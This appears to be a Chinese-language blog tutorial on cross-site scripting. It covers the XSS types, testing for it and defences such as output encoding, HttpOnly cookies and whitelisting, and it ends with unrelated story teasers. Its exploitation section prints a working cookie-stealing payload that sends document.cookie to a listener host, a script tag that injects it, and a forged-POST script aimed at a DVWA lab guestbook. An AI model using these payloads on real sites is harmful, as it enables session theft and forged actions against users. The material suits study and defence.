XSS知识大总结

XSS-即Cross Site Scripting. 为了与"CSS"不混淆,故简称XSS.

Hacker

一、XSS形成原理及分类

  • XSS本质:系统将用户输入的脚本代码(JS, Flash script)执行了,违背了原本接收数据的本意。从而造成了一些违背系统愿意的后果。
  • XSS根本原因:系统没有对用户输入数据进行编码,转义,过滤限制等处理。
  • XSS三类:
    先说下浏览器与服务器架构层次:***User - IE(Chrome) - Java/PHP/Python - DB ***
    • 反射型非持久型,在上面的四层架构中,用户使用浏览器,然后浏览器发送请求到服务器后台的Java或者PHP,或者Python,然后服务器逻辑程序返回响应结果,传送到客户端浏览器显示。
    • 存储型持久型,在上面四层架构中,用户使用浏览器发送请求到服务器,应用逻辑向数据库存取数据,(XSS代码存储在DB中),再经过应用程序发送响应传送到浏览器显示。
    • DOM-Based型非持久型,在上面的四层架构中,只涉及用户浏览器,变化只发生在客户端的JS与HTML之间。不涉及服务器交互。

二、XSS如何测试

因为XSS形成的原因是系统未对用户输入数据进行处理,直接记录在系统内,又因为前端代码在浏览器可见,所以应该很容易想到直接输入特殊字符“<'>/"&”,然后查看网页源代码,看自己输入的字符显示的是否是经过处理后的。如果没有转义,编码,那么可以断定该页面存在XSS漏洞。
之所以测试这6个字符是否被编码,是因为这6个字符如果未被编码,未被转义,那么系统就很容易存在html标签被闭合,插入类似“<script>脚本”的问题,那么就存在着极大的XSS漏洞风险,容易被非法用户利用。

三、XSS如何修复

  • (1)编码
    从上面的问题就可以得知,如果经测试存在XSS漏洞,则说明系统未对用户输入数据进行编码转义,那么相应的作为安全人员,就应该给开发人员通知,改进相应的模块,加入对用户输入数据编码过滤处理的逻辑,从而修复漏洞。一般来说,对用户输入的数据,尤其是这6个字符:>'&/<",具体编码目标格式应结合具体情况而定,对相应数据进行HtmlEncode,JavascriptEncode,URLEncode,甚至对CSS里的数据运行相应的OWASP ESAPI中的encodeForCSS()函数。具体用哪一种编码方式,需要看系统将数据输出显示在哪个位置,是JS里,是HTML里,还是CSS里。
    举例来说,如果是HTML编码,相应的,应该对这6个编码为:
标签 HtmlEncode
< ** &lt;**
> &gt;
& &amp;
" &quot;
' &#x27;
/ &#x2F;
  • (2)小而有用策略
    因为有利用XSS截取Cookie的,所以可以将cookie标记为httponly,这样JS不能获取,也可以将cookie与客户端的IP绑定,从而就算盗取也没用。
  • (3)黑白名单过滤输入
    因为<script>等标签对于留言板,评论等内容来说,很容易存在XSS注入,所以设置白名单,只允许信任的标签输入,类似:<a>,<img>,<div>等。优先选择白名单策略,因为黑名单可能会漏掉一些可能的注入情况,当然白名单也不是万无一失,需要定期更新排查。

四、XSS如何如何利用,有哪些利用方式?

  • (1)窃取cookie,直接登录用户账户(cookie欺骗);
  • cookie窃取,一般是利用存储型漏洞,利用代码如下:
    (代码目录)127.0.0.1/evil/evil.js Payload代码如下:
var img = document.createElement("img");
img.src = "http://127.0.0.2:2000/cookie/"+escape(document.cookie);
document.body.appendChild(img);

则在留言板中嵌入代码为:

<script src="http://127.0.0.1/evil/evil.js"></script>
  • 当然cookie获取需要自己在服务器接受数据,开启路径接收请求:


    后台接收路径

    接收结果:


    cookie窃取结果
  • (2)伪造请求,用JS模拟用户发送post/get请求,自动删除信息,自动发消息等;
    "Code目录127.0.0.1/evil/hack_post.js" :

var url = "http://127.0.0.1/dvwa/vulnerabilities/xss_s/"
var postdata = "txtName=Hacker&mtxMessage=Hacker+is+coming,+I+am+Liuning.&btnSign=Sign+Guestbook";  // post数据格式与get一样

var xmlhttp = null;
if(window.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();
}
else if(window.ActiveXObject){
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
if(xmlhttp!=null){
    xmlhttp.open("POST", url, true)
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
    xmlhttp.send(postdata)
}
else{
    alert("Your browser dosn't support XMLHttpRequest.")
}
xmlhttp.onreadystatechange = function(){
    if(xmlhttp.readyState == 4 && xmlhttp.status == 200){
        alert("Hack 2 success!");
    }
}

面板注入代码:

注入XSS

刷新结果:注入成功!
post请求伪造,每次刷新弹出success,多条记录

  • (3)钓鱼:(用一个假页面或弹窗伪造真实应用,欺骗用户账号密码)

五、XSS利用工具:BEFF,POC

Beff相关内容可以安装Kali(Debian发行版)系统,一应相关安全利用工具都随系统安装完善。
Kali系统的相关工具类似Beff,提供的是现成的XSS脚本,如默认的"127.0.0.1:3000/hook.js",直接将这个链接注入到面板中就好。即工具的作用是不用自己写注入脚本(Payload)了。

2016.10.28 晚 上海

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,265评论 6 490
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,078评论 2 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 156,852评论 0 347
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,408评论 1 283
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,445评论 5 384
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,772评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,921评论 3 406
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,688评论 0 266
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,130评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,467评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,617评论 1 340
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,276评论 4 329
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,882评论 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,740评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,967评论 1 265
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,315评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,486评论 2 348

推荐阅读更多精彩内容